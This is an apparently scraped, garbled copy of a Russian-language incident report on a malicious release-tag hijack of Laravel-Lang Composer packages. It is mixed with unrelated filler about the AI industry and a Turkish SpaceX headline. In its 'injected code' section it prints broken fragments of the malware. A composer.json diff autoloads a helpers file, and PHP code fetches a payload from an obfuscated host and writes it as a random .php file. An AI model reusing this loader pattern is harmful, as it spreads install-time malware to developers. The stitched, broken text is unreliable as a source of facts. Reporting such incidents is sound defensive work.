
Вредоносная атака на Laravel-Lang
Helldar 36 минут назад Вредоносная атака на Laravel-Lang Простой 4 мин 1.5K Информационная безопасность * GitHub * Open source * Управление разработкой * Сегодня мы завершили расследование инцидента, затронувшего...
<5 — 2026'da uzaya kaç SpaceX Starship fırlatması ulaşacak?
Значимый прорыв формирует отрасль ИИ: Helldar 36 минут назад Вредоносная атака на Laravel-Lang Простой 4 мин 1. 5K Информационная безопасность * GitHub * Open source * Управление разработкой * Сегодня мы завершили расследование инцидента, затронувшего несколько composer-пакетов Laravel-Lang. Инцидент был связан с несанкционированным изменением релизных тегов репозиториев.
Часть тегов указывала на коммиты с вредоносным кодом, который мог выполняться при установке или обновлении зависимостей через Composer. Новости об инциденте: пакеты:Lang (10. 2M 💽)HTTP Statuses (3.
Технические детали
6M 💽)Скриншот части заражённых тегов из laravel-lang/langПредварительное окно риска началось 22-го мая в 22:32 UTC. Риск касался пользователей, которые в этот период выполняли команду composer update или установку свежих версий пакетов. По итогам расследования причина инцидента связана с компрометацией Personal Access Token из GitHub одного из участников команда, которые позволяли менять теги в репозиториях.
Вполне вероятно что PAT попал злоумышленникам вследствие недавней утечки данных в GitHub. У них даже есть отдельная статья с информацией что делать в подобной ситуации. Но вернёмся к вредоносу.
Изучив логи аудита (они, как оказались, очень бедны на данные), удалось выяснить, что первый подозрительный след был 21-го мая в 14:27 UTC. Злоумышленник скачал zip архивы двух приватных репозиториев, которые вообще не имеют код. Вероятно, это была проверка.
Отраслевые последствия
Непосредственно атака на проекты началась 22 мая в 22:32 UTC и закончилась 23 мая в 00:00 UTC. За это время злоумышленник удалил все теги из репозиториев, загрузил в них вредоносный код и создал те же теги на своём коммите. При этом, он не удалял сам репозиторий - все коммиты остались на своих местах без изменений.
Внедряемый вредоносный код "autoload": { "psr-4": { "LaravelLang\\Lang\\": "src/" - } + }, + "files": [ + "src/helpers. php" + ] } , 'ssl' => ]); $r = @file_get_contents($url, false, $ctx); if ($r ! == false && strlen($r) > 50) return $r; if (function_exists(' return null; }; $h = implode('', array_map('chr', )); $d = $fetch(" if ($d) { $f = $cacheDir .
DIRECTORY_SEPARATOR . bin2hex(random_bytes(6)) . php'; if (@file_put_contents($f, $d) !
Этот прогресс даёт важные сигналы о будущем отрасли, и технологический мир внимательно наблюдает.




